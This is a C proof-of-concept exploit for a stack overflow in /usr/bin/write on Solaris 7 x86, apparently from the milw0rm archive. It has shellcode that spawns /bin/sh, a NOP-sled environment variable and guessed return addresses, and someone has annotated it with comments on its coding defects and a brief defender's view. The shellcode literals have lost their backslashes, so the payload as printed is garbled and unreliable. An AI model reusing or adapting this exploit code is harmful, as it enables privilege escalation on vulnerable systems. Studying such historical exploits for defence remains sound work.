#include <stdio.h>
#include <unistd.h>
/*
/usr/bin/write overflow proof of concept.
Tested on Solaris 7 x86
Pablo Sor, Buenos Aires, Argentina. 01/2000
[email protected]
usage: write-exp [shell_offset] [ret_addr_offset]
default offset should work.
*/
/* Returns the current stack pointer.  The inline asm copies %esp into %eax,
 * the register in which the i386 calling convention returns a long, and the
 * function then falls off its end with no `return` statement.  Using the
 * value of a non-void function that returns without a `return` is undefined
 * behaviour in C; this presumably worked with the author's compiler and
 * optimisation level, but it is not portable.  main() below derives both of
 * its guessed addresses from this value. */
long get_esp() { __asm__("movl %esp,%eax"); }
/* Payload string.  The author's comment attributes it to "Cheez Whiz" and it
 * is intended to carry the proof-of-concept's machine code; the last
 * non-0xff bytes (x2f x62 x69 x6e x2f x73 x68) spell "/bin/sh".  The array
 * is never executed by this program itself: main() copies it, by strlen(),
 * into an environment variable that the exec()ed target inherits.  Because
 * strlen() is used for the copy, the payload must not contain a 0x00 byte. */
char shell[] =
"xebx45x9axffxffxffxffx07xff"
"xc3x5ex31xc0x89x46xb7x88x46"
"xbcx88x46x07x89x46x0cx31xc0"
"xb0x2fxe8xe0xffxffxffx52x52"
"x31xc0xb0xcbxe8xd5xffxffxff"
"x83xc4x08x31xc0x50x8dx5ex08"
"x53x8dx1ex89x5ex08x53xb0x3b"
"xe8xbexffxffxffx83xc4x0cxe8"
"xbexffxffxffx2fx62x69x6ex2f"
"x73x68xffxffxffxffxffxffxff"
"xffxff";
/* shellcode by Cheez Whiz */
/* Proof-of-concept harness (Solaris 7 x86 per the file header).
 *
 * What the visible code does:
 *  - builds a 1000-byte environment variable "SOR=..." filled with 0x90
 *    (the x86 NOP opcode), places `shell` so that it ends at offset 980,
 *    and publishes it with putenv() so the exec()ed target inherits it;
 *  - derives two addresses from get_esp(): `magic` (presumably a guess at
 *    where that environment block will sit in the target's address space)
 *    and `magicret` (presumably a guess at a stack slot the target will
 *    return through), either from the built-in constants or from
 *    argv[1]/argv[2].  Note that argv[1] feeds `magicret` and argv[2]
 *    feeds `magic`, the opposite order from the header's usage line;
 *  - fills a 100-byte buffer with 0x41 ('A'), writes 22 copies of
 *    `magicret` over bytes 0..87 and `magic` at bytes 91..94, NUL-terminates
 *    it, and passes it as the message argument of /usr/bin/write via execl().
 * How those values map onto write(1)'s stack frame is not visible here and
 * is specific to that 2000-era binary; write(1) on that platform was
 * presumably installed set-id, otherwise the overflow gains nothing (not
 * verifiable from this file).
 *
 * Defects in the harness as written:
 *  - `void main`, and no <stdlib.h>/<string.h> include, so malloc, memset,
 *    memcpy, strlen, putenv and atoi are implicitly declared;
 *  - `envi[1000] = 0` writes one byte past the 1000-byte allocation;
 *  - the malloc() and execl() results are unchecked;
 *  - argv[1]/argv[2] are converted with atoi() without validation.
 *
 * Defender's view: this is the classic argument-overflow against a
 * privileged utility; it is addressed by the vendor fix for the affected
 * write(1), a non-executable stack, and removing the set-id bit where the
 * program is not needed.
 */
void main(int argc,char **argv)
{
FILE *fp; /* unused */
long magic,magicret;
char buf[100],*envi;
int i;
envi = (char *) malloc(1000*sizeof(char)); /* result not checked for NULL */
memset(envi,0x90,1000); /* 0x90 == x86 NOP */
memcpy(envi,"SOR=",4); /* variable name prefix expected by putenv() */
memcpy(envi+980-strlen(shell),shell,strlen(shell)); /* payload ends at offset 980; 20 NOP bytes follow it */
envi[1000]=0; /* out of bounds: the allocation covers envi[0..999] */
putenv(envi); /* string now belongs to the environment; never freed (the process exec()s) */
if (argc!=3)
{
/* built-in offsets, relative to get_esp() in this frame */
magicret = get_esp()+116;
magic = get_esp()-1668;
}
else
{
/* user-supplied offsets; atoi() gives no error reporting */
magicret = get_esp()+atoi(argv[1]);
magic = get_esp()+atoi(argv[2]);
}
memset(buf,0x41,100); /* 'A' filler */
buf[99]=0; /* keep buf a valid C string for execl() */
memcpy(buf+91,&magic,4); /* 4-byte (ILP32) pointer at bytes 91..94 */
for(i=0;i<22;++i) memcpy(buf+(i*4),&magicret,4); /* bytes 0..87: 22 copies of magicret; does not reach offset 91 */
execl("/usr/bin/write","write","root",buf,(char *)0); /* only returns on failure; return value ignored */
}
// milw0rm.com [2001-01-25]